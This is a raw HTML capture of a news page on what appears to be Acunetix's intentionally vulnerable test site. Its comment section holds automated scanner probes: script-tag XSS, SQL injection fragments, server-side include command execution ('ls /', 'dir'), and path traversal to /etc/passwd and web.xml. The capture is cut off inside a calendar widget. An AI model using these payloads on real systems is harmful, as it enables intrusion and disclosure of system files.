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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKj2qK0CgKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9rxwFhLxxDYwM0HAXEgfiaKoEHeg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:36 PM</DIV><DIV class="CommentText">3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">http:\\3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">https:\\3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:37 PM</DIV><DIV class="CommentText">//3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">\\3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTp://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:38 PM</DIV><DIV class="CommentText">HtTpS://3528756824722488419.owasp.org</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:29 PM</DIV><DIV class="CommentText">zApPX3sS</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:59 PM</DIV><DIV class="CommentText"> UNION ALL select NULL -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:16 PM</DIV><DIV class="CommentText"></div><scrIpt>alert(1);</scRipt><div></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:56 PM</DIV><DIV class="CommentText">"</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:57 PM</DIV><DIV class="CommentText">"</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:57 PM</DIV><DIV class="CommentText">;</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:57 PM</DIV><DIV class="CommentText">;</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="dir \"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:08:00 PM</DIV><DIV class="CommentText">" UNION ALL select NULL -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:08:00 PM</DIV><DIV class="CommentText">) UNION ALL select NULL -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:41 PM</DIV><DIV class="CommentText">0W45pz4p</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:42 PM</DIV><DIV class="CommentText"></div><script>alert(1);</script><div></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:31 PM</DIV><DIV class="CommentText">c:/Windows/system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../Windows/system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">c:\Windows\system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system.ini</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:32 PM</DIV><DIV class="CommentText">/etc/passwd</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../etc/passwd</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:33 PM</DIV><DIV class="CommentText">c:\</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">../../../../../../../../../../../../../../../../</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:34 PM</DIV><DIV class="CommentText">WEB-INF/web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">WEB-INF\web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">/WEB-INF/web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">\WEB-INF\web.xml</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:05:35 PM</DIV><DIV class="CommentText">thishouldnotexistandhopefullyitwillnot</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:58 PM</DIV><DIV class="CommentText"> AND 1=1 -- </DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com:80/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:11 PM</DIV><DIV class="CommentText">http://www.google.com</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">http://www.google.com:80/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com:80/</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:12 PM</DIV><DIV class="CommentText">www.google.com</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:06:13 PM</DIV><DIV class="CommentText">www.google.com:80/search?q=OWASP%20ZAP</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="ls /"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText">"><!--#EXEC cmd="ls /"--><</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>116.6.234.163</strong>7/25/2022 1:07:03 PM</DIV><DIV class="CommentText"><!--#EXEC cmd="dir \"--></DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td 